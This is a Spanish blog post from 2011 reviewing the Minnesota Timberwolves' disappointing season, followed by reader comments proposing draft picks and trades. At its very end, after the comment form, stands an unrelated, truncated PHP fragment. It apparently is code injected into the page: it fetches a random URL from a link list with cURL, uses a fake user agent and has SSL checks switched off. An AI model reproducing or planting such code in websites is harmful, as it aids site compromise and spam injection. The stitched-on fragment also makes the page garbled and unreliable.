Minnesota Timberwolves: Muy deficiente

17 de June de 2011 por txusma

No creo que ningún aficionado de los Wolves soñara a principio de temporada con que su equipo se clasificara para los playoffs, pero pocos imaginarían que la temporada resultaría tan decepcionante como lo ha sido. El curso pasado  Minnesota tan solo fue capaz de ganar 15 partidos por lo que se consideraba que sería fácil superar semejante actuación. A la práctica, la cosa no ha sido tan sencilla y los Wolves solo han podido vencer en 17 encuentros con una racha final de 15 derrotas consecutivas.

Kevin Love ha sido, sin duda, uno de los grandes protagonistas de la temporada NBA al conseguir 53 dobles-dobles consecutivos, la mejor racha desde 1976. Además, en noviembre anotó 31 puntos y capturó 31 rebotes, protagonizando el primer 30-30 desde 1982. Marcas de otros tiempos que no se han trasladado al balance del equipo y es que el ex de UCLA ha estado tremendamente solo. Michel Beasley ha mejorado sus prestaciones respecto a sus actuaciones en Miami pero es complicado que puede quitarse algún día la etiqueta de jugador egoísta que solo piensa en si mismo. Tras estos dos jugadores, el vacío. Tan solo la llegada de Anthony Randolph y la sobriedad de Luke Ridnour han roto la monotonía.

De nuevo, podemos decir aquello de que el listón está bajísimo y que es complicado hacerlo peor. La llegada de Ricky y las incorporaciones que puedan producirse este verano han de mejorar por fuerza los resultados anteriores.

Lo mejor: Kevin Love. El correcto papel de Luke Ridnour, la recuperación de Anthony Randolph y el número 2 del draft. Las múltiples oportunidades de mejora que tiene la plantilla.

Lo peor: La regresión de Jonny Flynn debido a las lesiones, el discreto papel de Wes Johnson en su temporada rookie y la actitud del GM de los Wolves, David Kahn, tras el sorteo del draft.

Jugando a GM:

Todos los mockdraft dan como número 2 del draft a Derrick Williams pero el ex jugador de Arizona ocupa la misma posición que Michael Beasley. Por eso, todo parece indicar que Williams y Beasley no cohabitarán en el vestuario.

– Yo preferiría mantener el número 2 del draft para escoger a Derrick Williams. Su ética de trabajo está a años luz del ex de los Heat.

Montaría un pack con Michel Beasley, Jonny Flynn (sin sitio tras la llegada de Ricky), la elección 20 del draft e incluso Darko Milicic para conseguir veteranía y experiencia con la que rodear a Kevin Love, Ricky Rubio y Wesley Johnson. El objetivo debería ser un center puro o un escolta. Se podría estudiar un traspaso con Beasley y Chris Kaman como piezas centrales o intentaría ir a por jugadores como Stephen Jackson o Kevin Martin.

¿O por que no un Jonny Flynn por Rudy Fernandez? En Portland no están muy contentos con el español y un base suplente les vendría muy bien. Rudy en Minnesota ayudaría a integrar a Ricky y sería un jugador muy valioso como escolta titular. Seguro que el mallorquín no desaprovecha la oportunidad.

Comenta

17 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Pues sí, muy lamentable lo de las 17 victorias… aunque para mí lo realmente jodido son los casi 108 puntos que les han colado por partido. En este sentido señalo con el dedo a Kurt Rambis, cuyo gran trabajo en los Lakers no se ha visto por ningún lado en Minnesotta. ¿Hay entrenador ahí o qué? Si no solucionan eso lo llevan claro juegue quien juegue.
    Por lo demás cualquier aficionado medio cambia 5 o 6 victorias que no conducen a ningún lado por el pasote de haber visto la temporada que se ha cascado Love. Al final todos sabemos que hay victorias que directamente se regalan al final para posicionarse para la lotería (aunque no te toque el #1 ni haciendo trampas) No creo que esas 17 victorias sean especialmente sangrantes en este sentido.

    Después las carcajadas todavía resuenan del draft de Ricky. Además de él Flynn, Ellinton y ahora ya no sirve ninguno de los dos. Y que no se confíe Ricky porque Ridnour va a ser un hueso duro para jugarse las castañas… confiemos en un gran impacto defensivo porque de otra manera lo va a pasar muy mal. El tema de los bases hay que solucionarlo lógicamente, y parece que todo tiene que pasar por largar a Flynn. Sin embargo no le veo a las órdenes de McMallon y Rudy todavía va a tener que sudar para que le faciliten la vida en Portland ni siquiera para salir.

    Hay que tener cuidado con qué movimientos deben hacerse. Me vais a tachar de loco pero yo me movería con cautela.
    No es que deban ser intransferibles, pero sería una verdadera lástima soltar a Milicic o Beasley ahora que parece que han encontrado su sitio. Ambos han jugado bastante bien y se les ve a gusto, lo cual en su caso puede marcar la diferencia porque virtudes tienen (aunque a veces traten de esconderlas con todas sus ganas) De todas formas si no traspasan el pick 2 y pillan a Williams está bastante claro que Beasley es moneda de cambio declarada.
    Tampoco vería con buenos ojos taponar la progresión de Wesley Johnson. Me parece pronto para crucificarle.

    En cambio la experiencia me deja muy poca confianza en Webster y en Randolph, incluso con los buenos últimos partidos de este último. No tengo ni idea de qué es lo que pasa con estos tíos porque me cuesta creer que no sirvan para esta competición.

    Yo, independientemente de los resultados buscaría empezar a estabilizar la plantilla con vistas a medio plazo, a partir del núcleo duro:
    – Ridnour/Ricky
    – W. Johnson
    – Beasley ó D. Williams (uno de los dos)
    – Love/¿Randolph??
    – Milicic/Pekovic ó Tolliver (uno de los dos)
    Eso y 3 movimientos más que lo refuercen y que no comprometan demasiado salarialmente. El objetivo debería ser pasar de las 30 victorias antes de pensar en dar un verdadero salto de calidad, a ver cómo se desarrollan algunos jovenes para apuntalar lo que hace falta.

      Citar

  2. jas dice:
    #2

    El otro dia vi un rumor en hoopshype q decía q staban interesados en hacer un intercambio pick 2 por monta ellis

      Citar

  3. Gsus dice:
    #3

    Habra que esperar a la noche del draft para ver como queda la cosa,
    http://calabazasamorfeo.blogspot.com/­

      Citar

  4. HisRoyalAirness dice:
    #4

    Confirmado lo de Ricky. Secreto a voces

      Citar

  5. TheDeerHunter dice:
    #5

    Me preocupa bastante la adaptación de Ricky al “triángulo ofensivo” que monta Rambis.

      Citar

  6. Txusma dice:
    #6

    Rambis juega en los Wolves un triángulo al estilo de los Lakers de Jackson?

      Citar

  7. TheDeerHunter dice:
    #7

    Desconozco hasta que punto son similares porque no he visto ni un sólo partido en directo de ellos, pero es la causa principal que se apunta del fracaso de Flynn este año.

      Citar

  8. CAMPO2 dice:
    #8

    Y segun hoopshype los Wolves se interesan en Pau Gasol

      Citar

  9. Txusma dice:
    #9

    Creo q en el artículo del mock ya lo comenté. Podrían cambiar a Gasol por el número 2 del draft. Supongo que los Lakers pillarían a Williams pero es un prototipo de jugador muy parecido a Odom en cuanto a físico y posiciones. ¿Habría movimientos en cadena?
    Por parte de los Wolves un juego interior Gasol-Love suena bien.

      Citar

  10. Esteban dice:
    #10

    el año de minesota es horrible, pero tiene un gran futuro, despues de muchos años malos logro un gran espacio salarial y una enorme cantidad de jugadores baratos y con potencial por ende transferibles
    a ver…
    love es un all star
    rubio un base joven barato y que puede ser el base titular de un equipo
    petokic, un pivot joven y grande de gran potencial, puede ser el interno suplente interesantisimo
    milic, dos años mas gatantizados pero pue rendir
    flynn, por su año rokkie y su valor es un jugador interesante e innecesario para este equipo, muy traspasable
    wes jhonson, un joven con un buen nivel, puede ser un sexto hombre o un alero importante
    beasley, joven y con derecho de preferencia, mucha calidad, muy interesante para traspasar
    riknur, base correcto y barato
    ranpholph, joven y con mucho potencial

    a ver, yo dejo a rubio y rinour de bases, bien cubierta
    busco un escolta importante, con BEASELEY Y EL 2 del draft
    wes de alero titular, y randolph de sexto hombre
    love su gran figura
    milicic y pètkovic dos buenos pivotes

    ahora, el 2 del draft y beasley es suficiente como para traer un escolta de garantias, POR EJEMPLO MONTA ELLIS, o el q se les ocurra

    con este equipo le queda espacio en el tope suficiente, para un escolta de trayectoria y un ala pivote suplente

    si estos jugadores pregresan como parece, y rubio responde en su año rokkie, y wes mejora su prestacion

    guarda con los mwolves

      Citar

  11. Cocinitas dice:
    #11

    Yo elegiria con el pick 2 a Derrick Williams y buscaria un escolta anotador tipo Monta Ellis, Stephen Jackson, J- Rich o Rip Hamilton con un trade por Beasley,Flynn y la segunda elección del draft. Buscaria un alero suplente y veterano en el mercado libre.
    Bases Ricky / Ridnour
    Escoltas Ellis / Webster / Ellington
    Aleros Williams / Wes Johnson / Jugador veterano
    Ala-pivot Love / Randolph
    Pivot Milicic / Pekovic / Tolliver

      Citar

  12. Esteban dice:
    #12

    cocinitas, eso es mas o menos lo que plantee yo, y no es para nada imposible, mas pensando en que detroit arranca una recontruccion beasley y flyn por hamilton para ellos es un negocion, hay que ver si hamilton quiere jugar en minesota y q valor tiene hoy por hoy RIP
    en cuanto a williams no comparto en absoluto, es un buen jugador y trabajaron, pero es solo una ala pivote rapido, por su bajo tamaño lo quieren hacer pasar a jugar de alero, pero es muy duro y lento para un alero NBA, ademas no tira bien a distancia, solo tiene un tiro zafable a pie firme,

    EN FIN, creo que es imposible que WILLIAMS tenga un gran futuro nba, seria un ala pivote de 25 puntos por partido en europa,. pero le faltan centimetros para la nba y rapides para jugar de alero.

    sin dudas wes jhonson mide lo mismo y es infinitamente mas agil que williams, y ademas creo yo que tiene un potencial gigante, incluso para ir a los 20 por partido este año

    en cuanto a fichajes en la agencia libre, MINESOTA ES UNO DE LOS EQUIPOS CON MENOS PRESUPUESTO COMPROMETIDO Y MENOS JUGADORES PARA RENOVAR ESTE AÑO,
    puede poner dinero por j.rich o reed y ver como les funcionan y salir a la temporada con todos sus jugadores y si las cosas van bien y ahy meter un cambio

    durante la temporada regular jugadores como flynn, beasley, derrick williams, randolph, incluso pektokiv seran mjuy valiosos y puede aprovecharse de equipos que entren en crisis este año

    a saber, los valores de milwakee, utha, los propios cavs, otra mala temporada de ambnos y empezaran a regalar a sus jugadores “caros” y “crecidos” para iniciar una recontruccion donde los valores jovenes de miensota pueden tener muchos pretendientes

    lease, al jefferson, miles, bogut, salmons, delfino, varejao, devin harris, gibson, baron davis, j.j. hickson, maggete, gooden

    la mayoria de estos jugadores no tienen lugar en una recontruccion de sus equipos que este año sera inevitble, dado q los veo a lso tres lejos de todo

      Citar

  13. safd dice:
    #13

    Buenas, llevo mucho tiempo leyendoos y me parecia buena ocasion para comentaros con el tema “jugando a gm”

    Sobre la temporada de los Wolves no hay que decir mucho mas…increible :S

    Yo lo que intentaria seria mandar a beasley/matthews y el pick 2 por mcgee y el pick 6
    Asi se beneficiarian los dos, wizards pillarian a kanter y tendrian alero
    Minnesota tendria un buen pivot y se quitaria el marron del pick 2. Despues pues tendrian que buscar un buen escolta. O tradeando gente o en los dos picks que tendrian. Yo confiaria en Matthews asiq pues hacer un trade Flynn-Rudy o algo asi, Rudy me molaria para los minnesotta con estos cambios.

    Osea que tendrian:
    Ricky-Rudy-Matthews-Love-Mcgee
    Ridnour-pick6-pick20-Randolph-Milicic

    Creo que estos movimientos no serian nada descabellado y volveriamos a ver ese gran duo Ricky-Rudy
    Y a ver si tienen suerte, con ese equipo deberian hacer mas que este año y si los picks nuevos cuajan….

    PD: Soy de los Hawks
    PD2: Mas les vale a los Wolves mejorar porque nos vamos a tragar muchos partidos suyos en el plus

      Citar

  14. safd dice:
    #14

    Me he liao con Wesley Matthews y Wesley Johnson jajajjajaa

      Citar

  15. TheDeerHunter dice:
    #15

    Pues parece que van a largar a Rambis.

      Citar

  16. Viva_Dirk dice:
    #16

    Normal, la llegada de Ricky hace imposible ejecutar el triangunlo, haber quien acaba dirigiendo a este prometedor grupo.

      Citar

  17. fan_r_miller dice:
    #17

    No me pregunteis porque soi fan fe Jonny Flyn i me da mucha lastima qe un jugador con tanto potencial lo desaproveche, aunque creo qe las lesiones le tocaron demasiado

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>